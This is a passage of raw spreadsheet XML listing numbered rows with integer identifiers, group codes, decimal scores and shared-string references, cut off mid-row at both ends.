      <c r="B6788">
        <v>4043</v>
      </c>
      <c r="C6788">
        <v>4043</v>
      </c>
      <c r="D6788">
        <v>3</v>
      </c>
      <c r="E6788">
        <v>0.61510002613067627</v>
      </c>
      <c r="F6788" t="s">
        <v>10120</v>
      </c>
      <c r="G6788" t="s">
        <v>13426</v>
      </c>
      <c r="H6788" t="s">
        <v>13427</v>
      </c>
    </row>
    <row r="6789" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6789" s="1">
        <v>6787</v>
      </c>
      <c r="B6789">
        <v>4353</v>
      </c>
      <c r="C6789">
        <v>4353</v>
      </c>
      <c r="D6789">
        <v>3</v>
      </c>
      <c r="E6789">
        <v>0.70579999685287476</v>
      </c>
      <c r="F6789" t="s">
        <v>10120</v>
      </c>
      <c r="G6789" t="s">
        <v>13428</v>
      </c>
      <c r="H6789" t="s">
        <v>13429</v>
      </c>
    </row>
    <row r="6790" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6790" s="1">
        <v>6788</v>
      </c>
      <c r="B6790">
        <v>4347</v>
      </c>
      <c r="C6790">
        <v>4347</v>
      </c>
      <c r="D6790">
        <v>3</v>
      </c>
      <c r="E6790">
        <v>0.50069999694824219</v>
      </c>
      <c r="F6790" t="s">
        <v>10120</v>
      </c>
      <c r="G6790" t="s">
        <v>13430</v>
      </c>
      <c r="H6790" t="s">
        <v>13362</v>
      </c>
    </row>
    <row r="6791" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6791" s="1">
        <v>6789</v>
      </c>
      <c r="B6791">
        <v>4046</v>
      </c>
      <c r="C6791">
        <v>4046</v>
      </c>
      <c r="D6791">
        <v>3</v>
      </c>
      <c r="E6791">
        <v>0.72399997711181641</v>
      </c>
      <c r="F6791" t="s">
        <v>10120</v>
      </c>
      <c r="G6791" t="s">
        <v>13431</v>
      </c>
      <c r="H6791" t="s">
        <v>13432</v>
      </c>
    </row>
    <row r="6792" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6792" s="1">
        <v>6790</v>
      </c>
      <c r="B6792">
        <v>36</v>
      </c>
      <c r="C6792">
        <v>36</v>
      </c>
      <c r="D6792">
        <v>3</v>
      </c>
      <c r="E6792">
        <v>0.44409999251365662</v>
      </c>
      <c r="F6792" t="s">
        <v>10120</v>
      </c>
      <c r="G6792" t="s">
        <v>13433</v>
      </c>
      <c r="H6792" t="s">
        <v>13434</v>
      </c>
    </row>
    <row r="6793" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6793" s="1">
        <v>6791</v>
      </c>
      <c r="B6793">
        <v>5450</v>
      </c>
      <c r="C6793">
        <v>5450</v>
      </c>
      <c r="D6793">
        <v>3</v>
      </c>
      <c r="E6793">
        <v>0.54989999532699585</v>
      </c>
      <c r="F6793" t="s">
        <v>10120</v>
      </c>
      <c r="G6793" t="s">
        <v>13435</v>
      </c>
      <c r="H6793" t="s">
        <v>10961</v>
      </c>
    </row>
    <row r="6794" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6794" s="1">
        <v>6792</v>
      </c>
      <c r="B6794">
        <v>667</v>
      </c>
      <c r="C6794">
        <v>667</v>
      </c>
      <c r="D6794">
        <v>3</v>
      </c>
      <c r="E6794">
        <v>0.44310000538825989</v>
      </c>
      <c r="F6794" t="s">
        <v>10120</v>
      </c>
      <c r="G6794" t="s">
        <v>13436</v>
      </c>
      <c r="H6794" t="s">
        <v>13437</v>
      </c>
    </row>
    <row r="6795" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6795" s="1">
        <v>6793</v>
      </c>
      <c r="B6795">
        <v>4351</v>
      </c>
      <c r="C6795">
        <v>4351</v>
      </c>
      <c r="D6795">
        <v>3</v>
      </c>
      <c r="E6795">
        <v>0.93040001392364502</v>
      </c>
      <c r="F6795" t="s">
        <v>10120</v>
      </c>
      <c r="G6795" t="s">
        <v>13438</v>
      </c>
      <c r="H6795" t="s">
        <v>13439</v>
      </c>
    </row>
    <row r="6796" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6796" s="1">
        <v>6794</v>
      </c>
      <c r="B6796">
        <v>4360</v>
      </c>
      <c r="C6796">
        <v>4360</v>
      </c>
      <c r="D6796">
        <v>3</v>
      </c>
      <c r="E6796">
        <v>0.99879997968673706</v>
      </c>
      <c r="F6796" t="s">
        <v>10120</v>
      </c>
      <c r="G6796" t="s">
        <v>13440</v>
      </c>
      <c r="H6796" t="s">
        <v>13441</v>
      </c>
    </row>
    <row r="6797" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6797" s="1">
        <v>6795</v>
      </c>
      <c r="B6797">
        <v>4361</v>
      </c>
      <c r="C6797">
        <v>4361</v>
      </c>
      <c r="D6797">
        <v>3</v>
      </c>
      <c r="E6797">
        <v>0.61059999465942383</v>
      </c>
      <c r="F6797" t="s">
        <v>10120</v>
      </c>
      <c r="G6797" t="s">
        <v>13442</v>
      </c>
      <c r="H6797" t="s">
        <v>13443</v>
      </c>
    </row>
    <row r="6798" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6798" s="1">
        <v>6796</v>
      </c>
      <c r="B6798">
        <v>37</v>
      </c>
      <c r="C6798">
        <v>37</v>
      </c>
      <c r="D6798">
        <v>3</v>
      </c>
      <c r="E6798">
        <v>0.94230002164840698</v>
      </c>
      <c r="F6798" t="s">
        <v>10120</v>
      </c>
      <c r="G6798" t="s">
        <v>13444</v>
      </c>
      <c r="H6798" t="s">
        <v>13445</v>
      </c>
    </row>
    <row r="6799" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6799" s="1">
        <v>6797</v>
      </c>
      <c r="B6799">
        <v>38</v>
      </c>
      <c r="C6799">
        <v>38</v>
      </c>
      <c r="D6799">
        <v>3</v>
      </c>
      <c r="E6799">
        <v>0.90090000629425049</v>
      </c>
      <c r="F6799" t="s">
        <v>10120</v>
      </c>
      <c r="G6799" t="s">
        <v>13446</v>
      </c>
      <c r="H6799" t="s">
        <v>13447</v>
      </c>
    </row>
    <row r="6800" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6800" s="1">
        <v>6798</v>
      </c>
      <c r="B6800">
        <v>4050</v>
      </c>
      <c r="C6800">
        <v>4050</v>
      </c>
      <c r="D6800">
        <v>3</v>
      </c>
      <c r="E6800">
        <v>0.89759999513626099</v>
      </c>
      <c r="F6800" t="s">
        <v>10120</v>
      </c>
      <c r="G6800" t="s">
        <v>13448</v>
      </c>
      <c r="H6800" t="s">
        <v>13449</v>
      </c>
    </row>
    <row r="6801" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6801" s="1">
        <v>6799</v>
      </c>
      <c r="B6801">
        <v>4053</v>
      </c>
      <c r="C6801">
        <v>4053</v>
      </c>
      <c r="D6801">
        <v>3</v>
      </c>
      <c r="E6801">
        <v>0.99210000038146973</v>
      </c>
      <c r="F6801" t="s">
        <v>10120</v>
      </c>
      <c r="G6801" t="s">
        <v>13450</v>
      </c>
      <c r="H6801" t="s">
        <v>13451</v>
      </c>
    </row>
    <row r="6802" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6802" s="1">
        <v>6800</v>
      </c>
      <c r="B6802">
        <v>5558</v>
      </c>
      <c r="C6802">
        <v>5558</v>
      </c>
      <c r="D6802">
        <v>3</v>
      </c>
      <c r="E6802">
        <v>0.72869998216629028</v>
      </c>
      <c r="F6802" t="s">
        <v>10120</v>
      </c>
      <c r="G6802" t="s">
        <v>13452</v>
      </c>
      <c r="H6802" t="s">
        <v>13453</v>
      </c>
    </row>
    <row r="6803" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6803" s="1">
        <v>6801</v>
      </c>
      <c r="B6803">
        <v>5452</v>
      </c>
      <c r="C6803">
        <v>5452</v>
      </c>
      <c r="D6803">
        <v>3</v>
      </c>
      <c r="E6803">
        <v>0.45489999651908869</v>
      </c>
      <c r="F6803" t="s">
        <v>10120</v>
      </c>
      <c r="G6803" t="s">
        <v>13454</v>
      </c>
      <c r="H6803" t="s">
        <v>13455</v>
      </c>
    </row>
    <row r="6804" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6804" s="1">
        <v>6802</v>
      </c>
      <c r="B6804">
        <v>493</v>
      </c>
      <c r="C6804">
        <v>493</v>
      </c>
      <c r="D6804">
        <v>3</v>
      </c>
      <c r="E6804">
        <v>0.37900000810623169</v>
      </c>
      <c r="F6804" t="s">
        <v>10120</v>
      </c>
      <c r="G6804" t="s">
        <v>13456</v>
      </c>
      <c r="H6804" t="s">
        <v>13457</v>
      </c>
    </row>
    <row r="6805" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6805" s="1">
        <v>6803</v>
      </c>
      <c r="B6805">
        <v>494</v>
      </c>
      <c r="C6805">
        <v>494</v>
      </c>
      <c r="D6805">
        <v>3</v>
      </c>
      <c r="E6805">
        <v>0.93300002813339233</v>
      </c>
      <c r="F6805" t="s">
        <v>10120</v>
      </c>
      <c r="G6805" t="s">
        <v>13458</v>
      </c>
      <c r="H6805" t="s">
        <v>13459</v>
      </c>
    </row>
    <row r="6806" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6806" s="1">
        <v>6804</v>
      </c>
      <c r="B6806">
        <v>35</v>
      </c>
      <c r="C6806">
        <v>35</v>
      </c>
      <c r="D6806">
        <v>3</v>
      </c>
      <c r="E6806">
        <v>0.9034000039100647</v>
      </c>
      <c r="F6806" t="s">
        <v>10120</v>
      </c>
      <c r="G6806" t="s">
        <v>13460</v>
      </c>
      <c r="H6806" t="s">
        <v>13447</v>
      </c>
    </row>
    <row r="6807" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6807" s="1">
        <v>6805</v>
      </c>
      <c r="B6807">
        <v>176</v>
      </c>
      <c r="C6807">
        <v>176</v>
      </c>
      <c r="D6807">
        <v>4</v>
      </c>
      <c r="E6807">
        <v>0.93029999732971191</v>
      </c>
      <c r="F6807" t="s">
        <v>13461</v>
      </c>
      <c r="G6807" t="s">
        <v>13462</v>
      </c>
      <c r="H6807" t="s">
        <v>13463</v>
      </c>
    </row>
    <row r="6808" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6808" s="1">
        <v>6806</v>
      </c>
      <c r="B6808">
        <v>6</v>
      </c>
      <c r="C6808">
        <v>6</v>
      </c>
      <c r="D6808">
        <v>4</v>
      </c>
      <c r="E6808">
        <v>0.99889999628067017</v>
      </c>
      <c r="F6808" t="s">
        <v>13461</v>
      </c>
      <c r="G6808" t="s">
        <v>13464</v>
      </c>
      <c r="H6808" t="s">
        <v>13465</v>
      </c>
    </row>
    <row r="6809" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6809" s="1">
        <v>6807</v>
      </c>
      <c r="B6809">
        <v>7291</v>
      </c>
      <c r="C6809">
        <v>7291</v>
      </c>
      <c r="D6809">
        <v>4</v>
      </c>
      <c r="E6809">
        <v>0.60750001668930054</v>
      </c>
      <c r="F6809" t="s">
        <v>13461</v>
      </c>
      <c r="G6809" t="s">
        <v>13466</v>
      </c>
      <c r="H6809" t="s">
        <v>13467</v>
      </c>
    </row>
    <row r="6810" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6810" s="1">
        <v>6808</v>
      </c>
      <c r="B6810">
        <v>1652</v>
      </c>
      <c r="C6810">
        <v>1652</v>
      </c>
      <c r="D6810">
        <v>4</v>
      </c>
      <c r="E6810">
        <v>0.9868999719619751</v>
      </c>
      <c r="F6810" t="s">
        <v>13461</v>
      </c>
      <c r="G6810" t="s">
        <v>13468</v>
      </c>
      <c r="H6810" t="s">
        <v>13469</v>
      </c>
    </row>
    <row r="6811" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6811" s="1">
        <v>6809</v>
      </c>
      <c r="B6811">
        <v>1657</v>
      </c>
      <c r="C6811">
        <v>1657</v>
      </c>
      <c r="D6811">
        <v>4</v>
      </c>
      <c r="E6811">
        <v>0.51459997892379761</v>
      </c>
      <c r="F6811" t="s">
        <v>13461</v>
      </c>
      <c r="G6811" t="s">
        <v>13470</v>
      </c>
      <c r="H6811" t="s">
        <v>13471</v>
      </c>
    </row>
    <row r="6812" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6812" s="1">
        <v>6810</v>
      </c>
      <c r="B6812">
        <v>1383</v>
      </c>
      <c r="C6812">
        <v>1383</v>
      </c>
      <c r="D6812">
        <v>4</v>
      </c>
      <c r="E6812">
        <v>0.81260001659393311</v>
      </c>
      <c r="F6812" t="s">
        <v>13461</v>
      </c>
      <c r="G6812" t="s">
        <v>13472</v>
      </c>
      <c r="H6812" t="s">
        <v>13473</v>
      </c>
    </row>
    <row r="6813" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6813" s="1">
        <v>6811</v>
      </c>
      <c r="B6813">
        <v>7300</v>
      </c>
      <c r="C6813">
        <v>7300</v>
      </c>
      <c r="D6813">
        <v>4</v>
      </c>
      <c r="E6813">
        <v>0.74459999799728394</v>
      </c>
      <c r="F6813" t="s">
        <v>13461</v>
      </c>
      <c r="G6813" t="s">
        <v>13474</v>
      </c>
      <c r="H6813" t="s">
        <v>13475</v>
      </c>
    </row>
    <row r="6814" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6814" s="1">
        <v>6812</v>
      </c>
      <c r="B6814">
        <v>7286</v>
      </c>
      <c r="C6814">
        <v>7286</v>
      </c>
      <c r="D6814">
        <v>4</v>
      </c>
      <c r="E6814">
        <v>0.94300001859664917</v>
      </c>
      <c r="F6814" t="s">
        <v>13461</v>
      </c>
      <c r="G6814" t="s">
        <v>13476</v>
      </c>
      <c r="H6814" t="s">
        <v>13477</v>
      </c>
    </row>
    <row r="6815" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6815" s="1">
        <v>6813</v>
      </c>
      <c r="B6815">
        <v>1396</v>
      </c>
      <c r="C6815">
        <v>1396</v>
      </c>
      <c r="D6815">
        <v>4</v>
      </c>
      <c r="E6815">
        <v>0.43939998745918268</v>
      </c>
      <c r="F6815" t="s">
        <v>13461</v>
      </c>
      <c r="G6815" t="s">
        <v>13478</v>
      </c>
      <c r="H6815" t="s">
        <v>13479</v>
      </c>
    </row>
    <row r="6816" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6816" s="1">
        <v>6814</v>
      </c>
      <c r="B6816">
        <v>1656</v>
      </c>
      <c r="C6816">
        <v>1656</v>
      </c>
      <c r="D6816">
        <v>4</v>
      </c>
      <c r="E6816">
        <v>0.97369998693466187</v>
      </c>
      <c r="F6816" t="s">
        <v>13461</v>
      </c>
      <c r="G6816" t="s">
        <v>13480</v>
      </c>
      <c r="H6816" t="s">
        <v>13481</v>
      </c>
    </row>
    <row r="6817" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6817" s="1">
        <v>6815</v>
      </c>
      <c r="B6817">
        <v>173</v>
      </c>
      <c r="C6817">
        <v>173</v>
      </c>
      <c r="D6817">
        <v>4</v>
      </c>
      <c r="E6817">
        <v>0.4885999858379364</v>
      </c>
      <c r="F6817" t="s">
        <v>13461</v>
      </c>
      <c r="G6817" t="s">
        <v>13482</v>
      </c>
      <c r="H6817" t="s">
        <v>13483</v>
      </c>
    </row>
    <row r="6818" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6818" s="1">
        <v>6816</v>
      </c>
      <c r="B6818">
        <v>182</v>
      </c>
      <c r="C6818">
        <v>182</v>
      </c>
      <c r="D6818">
        <v>4</v>
      </c>
      <c r="E6818">
        <v>0.92549997568130493</v>
      </c>
      <c r="F6818" t="s">
        <v>13461</v>
      </c>
      <c r="G6818" t="s">
        <v>13484</v>
      </c>
      <c r="H6818" t="s">
        <v>13485</v>
      </c>
    </row>
    <row r="6819" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6819" s="1">
        <v>6817</v>
      </c>
      <c r="B6819">
        <v>7167</v>
      </c>
      <c r="C6819">
        <v>7167</v>
      </c>
      <c r="D6819">
        <v>4</v>
      </c>
      <c r="E6819">
        <v>0.99610000848770142</v>
      </c>
      <c r="F6819" t="s">
        <v>13461</v>
      </c>
      <c r="G6819" t="s">
        <v>13486</v>
      </c>
      <c r="H6819" t="s">
        <v>13487</v>
      </c>
    </row>
    <row r="6820" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6820" s="1">
        <v>6818</v>
      </c>
      <c r="B6820">
        <v>195</v>
      </c>
      <c r="C6820">
        <v>195</v>
      </c>
      <c r="D6820">
        <v>4</v>
      </c>
      <c r="E6820">
        <v>0.63789999485015869</v>
      </c>
      <c r="F6820" t="s">
        <v>13461</v>
      </c>
      <c r="G6820" t="s">
        <v>13488</v>
      </c>
      <c r="H6820" t="s">
        <v>13489</v>
      </c>
    </row>
    <row r="6821" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6821" s="1">
        <v>6819</v>
      </c>
      <c r="B6821">
        <v>7168</v>
      </c>
      <c r="C6821">
        <v>7168</v>
      </c>
      <c r="D6821">
        <v>4</v>
      </c>
      <c r="E6821">
        <v>0.50520002841949463</v>
      </c>
      <c r="F6821" t="s">
        <v>13461</v>
      </c>
      <c r="G6821" t="s">
        <v>13490</v>
      </c>
      <c r="H6821" t="s">
        <v>13491</v>
      </c>
    </row>
    <row r="6822" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6822" s="1">
        <v>6820</v>
      </c>
      <c r="B6822">
        <v>174</v>
      </c>
      <c r="C6822">
        <v>174</v>
      </c>
      <c r="D6822">
        <v>4</v>
      </c>
      <c r="E6822">
        <v>0.69559997320175171</v>
      </c>
      <c r="F6822" t="s">
        <v>13461</v>
      </c>
      <c r="G6822" t="s">
        <v>13492</v>
      </c>
      <c r="H6822" t="s">
        <v>13493</v>
      </c>
    </row>
    <row r="6823" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6823" s="1">
        <v>6821</v>
      </c>
      <c r="B6823">
        <v>1351</v>
      </c>
      <c r="C6823">
        <v>1351</v>
      </c>
      <c r="D6823">
        <v>4</v>
      </c>
      <c r="E6823">
        <v>0.94690001010894775</v>
      </c>
      <c r="F6823" t="s">
        <v>13461</v>
      </c>
      <c r="G6823" t="s">
        <v>13494</v>
      </c>
      <c r="H6823" t="s">
        <v>13495</v>
      </c>
    </row>
    <row r="6824" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6824" s="1">
        <v>6822</v>
      </c>
      <c r="B6824">
        <v>7165</v>
      </c>
      <c r="C6824">
        <v>7165</v>
      </c>
      <c r="D6824">
        <v>4</v>
      </c>
      <c r="E6824">
        <v>0.56110000610351563</v>
      </c>
      <c r="F6824" t="s">
        <v>13461</v>
      </c>
      <c r="G6824" t="s">
        <v>13496</v>
      </c>
      <c r="H6824" t="s">
        <v>13497</v>
      </c>
    </row>
    <row r="6825" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6825" s="1">
        <v>6823</v>
      </c>
      <c r="B6825">
        <v>1557</v>
      </c>
      <c r="C6825">
        <v>1557</v>
      </c>
      <c r="D6825">
        <v>4</v>
      </c>
      <c r="E6825">
        <v>0.50419998168945313</v>
      </c>
      <c r="F6825" t="s">
        <v>13461</v>
      </c>
      <c r="G6825" t="s">
        <v>13498</v>
      </c>
      <c r="H6825" t="s">
        <v>13499</v>
      </c>
    </row>
    <row r="6826" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6826" s="1">
        <v>6824</v>
      </c>
      <c r="B6826">
        <v>154</v>
      </c>
      <c r="C6826">
        <v>154</v>
      </c>
      <c r="D6826">
        <v>4</v>
      </c>
      <c r="E6826">
        <v>0.96859997510910034</v>
      </c>
      <c r="F6826" t="s">
        <v>13461</v>
      </c>
      <c r="G6826" t="s">
        <v>13500</v>
      </c>
      <c r="H6826" t="s">
        <v>13501</v>
      </c>
    </row>
    <row r="6827" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6827" s="1">
        <v>6825</v>
      </c>
      <c r="B6827">
        <v>1599</v>
      </c>
      <c r="C6827">
        <v>1599</v>
      </c>
      <c r="D6827">
        <v>4</v>
      </c>
      <c r="E6827">
        <v>0.44380000233650208</v>
      </c>
      <c r="F6827" t="s">
        <v>13461</v>
      </c>
      <c r="G6827" t="s">
        <v>13502</v>
      </c>
      <c r="H6827" t="s">
        <v>13503</v>
      </c>
    </row>
    <row r="6828" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6828" s="1">
        <v>6826</v>
      </c>
      <c r="B6828">
        <v>1600</v>
      </c>
      <c r="C6828">
        <v>1600</v>
      </c>
      <c r="D6828">
        <v>4</v>
      </c>
      <c r="E6828">
        <v>0.61059999465942383</v>
      </c>
      <c r="F6828" t="s">
        <v>13461</v>
      </c>
      <c r="G6828" t="s">
        <v>13504</v>
      </c>
      <c r="H6828" t="s">
        <v>13505</v>
      </c>
    </row>
    <row r="6829" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6829" s="1">
        <v>6827</v>
      </c>
      <c r="B6829">
        <v>1525</v>
      </c>
      <c r="C6829">
        <v>1525</v>
      </c>
      <c r="D6829">
        <v>4</v>
      </c>
      <c r="E6829">
        <v>0.91180002689361572</v>
      </c>
      <c r="F6829" t="s">
        <v>13461</v>
      </c>
      <c r="G6829" t="s">
        <v>13506</v>
      </c>
      <c r="H6829" t="s">
        <v>13507</v>
      </c>
    </row>
    <row r="6830" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6830" s="1">
        <v>6828</v>
      </c>
      <c r="B6830">
        <v>1604</v>
      </c>
      <c r="C6830">
        <v>1604</v>
      </c>
      <c r="D6830">
        <v>4</v>
      </c>
      <c r="E6830">
        <v>0.97180002927780151</v>
      </c>
      <c r="F6830" t="s">
        <v>13461</v>
      </c>
      <c r="G6830" t="s">
        <v>13508</v>
      </c>
      <c r="H6830" t="s">
        <v>13509</v>
      </c>
    </row>
    <row r="6831" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6831" s="1">
        <v>6829</v>
      </c>
      <c r="B6831">
        <v>1608</v>
      </c>
      <c r="C6831">
        <v>1608</v>
      </c>
      <c r="D6831">
        <v>4</v>
      </c>
      <c r="E6831">
        <v>0.6995999813079834</v>
      </c>
      <c r="F6831" t="s">
        <v>13461</v>
      </c>
      <c r="G6831" t="s">
        <v>13510</v>
      </c>
      <c r="H6831" t="s">
        <v>13511</v>
      </c>
    </row>
    <row r="6832" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6832" s="1">
        <v>6830</v>
      </c>
      <c r="B6832">
        <v>39</v>
      </c>
      <c r="C6832">
        <v>39</v>
      </c>
      <c r="D6832">
        <v>4</v>
      </c>
      <c r="E6832">
        <v>0.85170000791549683</v>
      </c>
      <c r="F6832" t="s">
        <v>13461</v>
      </c>
      <c r="G6832" t="s">
        <v>13512</v>
      </c>
      <c r="H6832" t="s">
        <v>13513</v>
      </c>
    </row>
    <row r="6833" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6833" s="1">
        <v>6831</v>
      </c>
      <c r="B6833">
        <v>7202</v>
      </c>
      <c r="C6833">
        <v>7202</v>
      </c>
      <c r="D6833">
        <v>4</v>
      </c>
      <c r="E6833">
        <v>0.90499997138977051</v>
      </c>
      <c r="F6833" t="s">
        <v>13461</v>
      </c>
      <c r="G6833" t="s">
        <v>13514</v>
      </c>
      <c r="H6833" t="s">
        <v>13515</v>
      </c>
    </row>
    <row r="6834" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6834" s="1">
        <v>6832</v>
      </c>
      <c r="B6834">
        <v>1518</v>
      </c>
      <c r="C6834">
        <v>1518</v>
      </c>
      <c r="D6834">
        <v>4</v>
      </c>
      <c r="E6834">
        <v>0.93980002403259277</v>
      </c>
      <c r="F6834" t="s">
        <v>13461</v>
      </c>
      <c r="G6834" t="s">
        <v>13516</v>
      </c>
      <c r="H6834" t="s">
        <v>13517</v>
      </c>
    </row>
    <row r="6835" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6835" s="1">
        <v>6833</v>
      </c>
      <c r="B6835">
        <v>1511</v>
      </c>
      <c r="C6835">
        <v>1511</v>
      </c>
      <c r="D6835">
        <v>4</v>
      </c>
      <c r="E6835">
        <v>0.68739998340606689</v>
      </c>
      <c r="F6835" t="s">
        <v>13461</v>
      </c>
      <c r="G6835" t="s">
        <v>13518</v>
      </c>
      <c r="H6835" t="s">
        <v>13519</v>
      </c>
    </row>
    <row r="6836" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6836" s="1">
        <v>6834</v>
      </c>
      <c r="B6836">
        <v>82</v>
      </c>
      <c r="C6836">
        <v>82</v>
      </c>
      <c r="D6836">
        <v>4</v>
      </c>
      <c r="E6836">
        <v>0.96729999780654907</v>
      </c>
      <c r="F6836" t="s">
        <v>13461</v>
      </c>
      <c r="G6836" t="s">
        <v>13520</v>
      </c>
      <c r="H6836" t="s">
        <v>13521</v>
      </c>
    </row>
    <row r="6837" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6837" s="1">
        <v>6835</v>
      </c>
      <c r="B6837">
        <v>1611</v>
      </c>
      <c r="C6837">
        <v>1611</v>
      </c>
      <c r="D6837">
        <v>4</v>
      </c>
      <c r="E6837">
        <v>0.79570001363754272</v>
      </c>
      <c r="F6837" t="s">
        <v>13461</v>
      </c>
      <c r="G6837" t="s">
        <v>13522</v>
      </c>
      <c r="H6837" t="s">
        <v>13523</v>
      </c>
    </row>
    <row r="6838" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6838" s="1">
        <v>6836</v>
      </c>
      <c r="B6838">
        <v>1612</v>
      </c>
      <c r="C6838">
        <v>1612</v>
      </c>
      <c r="D6838">
        <v>4</v>
      </c>
      <c r="E6838">
        <v>0.40040001273155212</v>
      </c>
      <c r="F6838" t="s">
        <v>13461</v>
      </c>
      <c r="G6838" t="s">
        <v>13524</v>
      </c>
      <c r="H6838" t="s">
        <v>13525</v>
      </c>
    </row>
    <row r="6839" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6839" s="1">
        <v>6837</v>
      </c>
      <c r="B6839">
        <v>7244</v>
      </c>
      <c r="C6839">
        <v>7244</v>
      </c>
      <c r="D6839">
        <v>4</v>
      </c>
      <c r="E6839">
        <v>0.53570002317428589</v>
      </c>
      <c r="F6839" t="s">
        <v>13461</v>
      </c>
      <c r="G6839" t="s">
        <v>13526</v>
      </c>
      <c r="H6839" t="s">
        <v>13527</v>
      </c>
    </row>
    <row r="6840" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6840" s="1">
        <v>6838</v>
      </c>
      <c r="B6840">
        <v>87</v>
      </c>
      <c r="C6840">
        <v>87</v>
      </c>
      <c r="D6840">
        <v>4</v>
      </c>
      <c r="E6840">
        <v>0.49020001292228699</v>
      </c>
      <c r="F6840" t="s">
        <v>13461</v>
      </c>
      <c r="G6840" t="s">
        <v>13528</v>
      </c>
      <c r="H6840" t="s">
        <v>13529</v>
      </c>
    </row>
    <row r="6841" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6841" s="1">
        <v>6839</v>
      </c>
      <c r="B6841">
        <v>93</v>
      </c>
      <c r="C6841">
        <v>93</v>
      </c>
      <c r="D6841">
        <v>4</v>
      </c>
      <c r="E6841">
        <v>0.99879997968673706</v>
      </c>
      <c r="F6841" t="s">
        <v>13461</v>
      </c>
      <c r="G6841" t="s">
        <v>13530</v>
      </c>
      <c r="H6841" t="s">
        <v>13531</v>
      </c>
    </row>
    <row r="6842" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6842" s="1">
        <v>6840</v>
      </c>
      <c r="B6842">
        <v>7208</v>
      </c>
      <c r="C6842">
        <v>7208</v>
      </c>
      <c r="D6842">
        <v>4</v>
      </c>
      <c r="E6842">
        <v>0.93290001153945923</v>
      </c>
      <c r="F6842" t="s">
        <v>13461</v>
      </c>
      <c r="G6842" t="s">
        <v>13532</v>
      </c>
      <c r="H6842" t="s">
        <v>13533</v>
      </c>
    </row>
    <row r="6843" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6843" s="1">
        <v>6841</v>
      </c>
      <c r="B6843">
        <v>7246</v>
      </c>
      <c r="C6843">
        <v>7246</v>
      </c>
      <c r="D6843">
        <v>4</v>
      </c>
      <c r="E6843">
        <v>0.93999999761581421</v>
      </c>
      <c r="F6843" t="s">
        <v>13461</v>
      </c>
      <c r="G6843" t="s">
        <v>13534</v>
      </c>
      <c r="H6843" t="s">
        <v>13535</v>
      </c>
    </row>
    <row r="6844" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6844" s="1">
        <v>6842</v>
      </c>
      <c r="B6844">
        <v>1596</v>
      </c>
      <c r="C6844">
        <v>1596</v>
      </c>
      <c r="D6844">
        <v>4</v>
      </c>
      <c r="E6844">
        <v>0.446399986743927</v>
      </c>
      <c r="F6844" t="s">
        <v>13461</v>
      </c>
      <c r="G6844" t="s">
        <v>13536</v>
      </c>
      <c r="H6844" t="s">
        <v>13537</v>
      </c>
    </row>
    <row r="6845" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6845" s="1">
        <v>6843</v>
      </c>
      <c r="B6845">
        <v>1594</v>
      </c>
      <c r="C6845">
        <v>1594</v>
      </c>
      <c r="D6845">
        <v>4</v>
      </c>
      <c r="E6845">
        <v>0.67979997396469116</v>
      </c>
      <c r="F6845" t="s">
        <v>13461</v>
      </c>
      <c r="G6845" t="s">
        <v>13538</v>
      </c>
      <c r="H6845" t="s">
        <v>13539</v>
      </c>
    </row>
    <row r="6846" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6846" s="1">
        <v>6844</v>
      </c>
      <c r="B6846">
        <v>1555</v>
      </c>
      <c r="C6846">
        <v>1555</v>
      </c>
      <c r="D6846">
        <v>4</v>
      </c>
      <c r="E6846">
        <v>0.79589998722076416</v>
      </c>
      <c r="F6846" t="s">
        <v>13461</v>
